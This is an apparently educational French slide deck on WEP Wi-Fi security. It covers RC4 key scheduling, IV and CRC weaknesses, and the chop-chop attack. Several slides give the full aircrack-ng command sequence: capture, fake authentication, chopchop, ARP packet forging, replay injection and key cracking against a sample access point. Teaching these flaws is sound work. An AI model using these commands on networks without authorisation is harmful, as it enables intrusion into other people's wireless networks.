Clé WEP 
AFIFI FAISSAL
• Type de réseau 
– LAN (Local Area Network) 
– MAN (Metropolitan Area network) 
– WAN (Wide Area Network) 
• Qu’est ce qu...
TCP/IP
WEP(Wired Equivalent Privacy) 
• Qu’est ce que le WEP? 
– Fait partie de la norme internationale IEEE 802.11 
– Une soluti...
WEP(Wired Equivalent Privacy) 
• Il est défini comme : 
– assez for: pour les clés longue (brute force) 
– à synchronisati...
Le chiffrement WEP 
• Il repose sur l’algorithme à clé symétrique RC4 
• Le chiffrement se décompose en plusieurs 
phases ...
L’algorithme RC4 dans WEP 
RC4 
– Symétrique 
– Chiffrement par flux 
– Différentes tailles de clé jusqu’à 256 bit 
– Il e...
Initialisation de la clé 
• Deux longueurs de clé WEP 
– Clé (40 bits, soit 5 octets ) + IV = 64 bits 
– Clé (104 bits, so...
Table «S» initialisée 
Mélange du tableau KSA 
pour i de 0 à 255 faire 
T[i]=i 
fin pour 
y ← 0 
pour x de 0 à 255 faire 
...
Pseudo Random Generator Algorithm PRGA 
PRGA(T) : 
x ← 0 
y ← 0 
x ← x+1 
y ← y+T[x] 
T[x] ↔ T[y] 
z ← T[x] + T[y] (modulo...
Opérations de chiffrement et de 
déchiffrement
LES FAILLES DU WEP 
• Social-Engineering 
• cryptanalyse
Les principales failles du WEP sont 
essentiellement les suivantes : 
• Les algorithmes de vérification d’intégrité et d’a...
Les faiblesses du IV 
IV moins de 17 millions de combinaisons 
forte possibilité de Collisions 
Sniffer le réseau : ETHERE...
Attaques contre le WEP 
L’attaque chop-chop 
• Le WEP utilise un contrôle de redondance cyclique ICV 
• Le CRC permet de s...
Trame1 Trame 2 
ajout 1 octet 
de données 
_____ DATA ___ ___ICV ___ 
D0 D1 D2 D3 D4 I3 I2 I1 I0 
+ + + + + + + + + 
K0 K1...
Suite L’attaque chop-chop 
scan des réseaux wifi 
airodump-ng -w out -c 10 --encrypt wep --bssid 
00:16:41:C9:E0:3F wlan0 ...
L'attaque Chopchop 
aireplay-ng -4 wlan0 -a 00:16:41:C9:E0:3F -h 
00:12:F0:6F:ED:38 
=> resultat : 2 fichiers .cap et .xor...
L'injection: Aireplay-ng -3, arp replay 
#aireplay-ng -3 -e nom_wifi -a 00:16:41:C9:E0:3F -h 
00:12:F0:6F:ED:38 -x600 -r a...
Attaques contre RC4
Implementation
haking wep
Prochain SlideShare
Chargement dans…5
×

haking wep

1 508 vues

Publié le

hacking wep : failles , vulnérabilités et menaces de la clé wep.

Publié dans : Internet
0 commentaire
0 j’aime
Statistiques
Remarques
  • Soyez le premier à commenter

  • Soyez le premier à aimer ceci

Aucun téléchargement
Vues
Nombre de vues
1 508
Sur SlideShare
0
Issues des intégrations
0
Intégrations
19
Actions
Partages
0
Téléchargements
29
Commentaires
0
J’aime
0
Intégrations 0
Aucune incorporation

Aucune remarque pour cette diapositive
  • Deux étapes sont nécessaires pour l’opération de chiffrement :
    • L’initialisation de la clé
    • La réalisation du cryptogramme (texte chiffré ou cyphertext)
  • IV est de 24 bits, soit 224 valeurs possibles (transporter en claire ds les trames)
  • Collision : avoir des trame chiffré avec la même clé ,
    Facile à détecter vu que l’ IV circule en claire
  • Le CRC permet de s’assurer de l’integrité des donnees mais en aucun cas de leur sécurité
    L’attaque chop-chop va donc utiliser cette faiblesse pou ´ r injecter des paquets sur le reseau.
  • haking wep

    1. 1. Clé WEP AFIFI FAISSAL
    2. 2. • Type de réseau – LAN (Local Area Network) – MAN (Metropolitan Area network) – WAN (Wide Area Network) • Qu’est ce qu’un réseau Wi-Fi? – Ondes radioélectriques – Standards 802.11
    3. 3. TCP/IP
    4. 4. WEP(Wired Equivalent Privacy) • Qu’est ce que le WEP? – Fait partie de la norme internationale IEEE 802.11 – Une solution de confidentialité équivalente à un réseau filaire – Employé dans un WLAN pour : » La confidentialité » L’authentification » L’intégrité
    5. 5. WEP(Wired Equivalent Privacy) • Il est défini comme : – assez for: pour les clés longue (brute force) – à synchronisation automatique: les paquets sont autonomes – efficace : rapides (chiffrement et déchiffrement) – normalement exportable : longueur de clé variable – optionnel : l’utilisation du WEP est optionnel
    6. 6. Le chiffrement WEP • Il repose sur l’algorithme à clé symétrique RC4 • Le chiffrement se décompose en plusieurs phases : – La création de la graine :IV+clé – La création du keystream – Le calcul ICV « Integrity Check Value » – La constitution du message final et son encapsulation dans une trame
    7. 7. L’algorithme RC4 dans WEP RC4 – Symétrique – Chiffrement par flux – Différentes tailles de clé jusqu’à 256 bit – Il est extrêmement rapide Fonctionement • On génère un flux de données de taille identique au flux de données claires et on fait un XOR entre les deux
    8. 8. Initialisation de la clé • Deux longueurs de clé WEP – Clé (40 bits, soit 5 octets ) + IV = 64 bits – Clé (104 bits, soit 13 octets) + IV = 128 bits Graine IV : vecteur d’initialisation est une séquence de bits qui change régulièrement
    9. 9. Table «S» initialisée Mélange du tableau KSA pour i de 0 à 255 faire T[i]=i fin pour y ← 0 pour x de 0 à 255 faire y ← y + T[x] + S[x] (modulo 256) T[x] ↔ T[y] fin pour
    10. 10. Pseudo Random Generator Algorithm PRGA PRGA(T) : x ← 0 y ← 0 x ← x+1 y ← y+T[x] T[x] ↔ T[y] z ← T[x] + T[y] (modulo 256) renvoie T[z] Obtention du keystream =>
    11. 11. Opérations de chiffrement et de déchiffrement
    12. 12. LES FAILLES DU WEP • Social-Engineering • cryptanalyse
    13. 13. Les principales failles du WEP sont essentiellement les suivantes : • Les algorithmes de vérification d’intégrité et d’authentification sont très facilement contournables. • Possibilité de construire des dictionnaires fournissant en fonction d’un IV, le keystream. • L’algorithme de chiffrement RC4 présente des clés faibles et l’espace disponible pour les IV est trop petit. • • Une même clé est utilisée pour tout le réseau et les clés de chiffrement sont statiques . • Clés courtes 40 bits (5 caractères !!!) ou 104 bits et/ou trop simples (attaque par dictionnaire)
    14. 14. Les faiblesses du IV IV moins de 17 millions de combinaisons forte possibilité de Collisions Sniffer le réseau : ETHEREAL, WIRESHARK (la carte Wi-Fi en mode monitor)
    15. 15. Attaques contre le WEP L’attaque chop-chop • Le WEP utilise un contrôle de redondance cyclique ICV • Le CRC permet de s’assurer de l’intégrité des données mais en aucun cas de leur sécurité • L’attaque chop-chop va donc utiliser cette faiblesse pour injecter des paquets sur le réseau.
    16. 16. Trame1 Trame 2 ajout 1 octet de données _____ DATA ___ ___ICV ___ D0 D1 D2 D3 D4 I3 I2 I1 I0 + + + + + + + + + K0 K1 K2 K3 K4 K5 K6 K7 K8 = = = = = = = = = R0 R1 R2 R3 R4 R5 R6 R7 R8 _____ DATA ____ ___ICV ___ D0 D1 D2 D3 D4 D5 J3 J2 J1 J0 + + + + + + + + + + K0 K1 K2 K3 K4 K5 K6 K7 K8 K9 = = = = = = = = = = S0 S1 S2 S3 S4 S5 S6 S7 S8 S9 Il est possible de passer du paquet 2 au paquet 1 en devinant la valeur de la somme I3+D5 (1 chance sur 256). On note X = I3 + D5.
    17. 17. Suite L’attaque chop-chop scan des réseaux wifi airodump-ng -w out -c 10 --encrypt wep --bssid 00:16:41:C9:E0:3F wlan0 on se fait passer pour un client: fake authentification aireplay-ng wlan0 -1 30 -e nom_wifi -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38
    18. 18. L'attaque Chopchop aireplay-ng -4 wlan0 -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 => resultat : 2 fichiers .cap et .xor Forger un paquet ARP avec Packetforge-ng packetforge-ng -0 -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 -k 192.168.1.1 -l 192.168.1.10 -y .xor -w arp.cap
    19. 19. L'injection: Aireplay-ng -3, arp replay #aireplay-ng -3 -e nom_wifi -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 -x600 -r arp.cap wlan0 Le crack de la clé wep avec Aircrack-ng #aircrack-ng out-01.cap
    20. 20. Attaques contre RC4
    21. 21. Implementation

    ×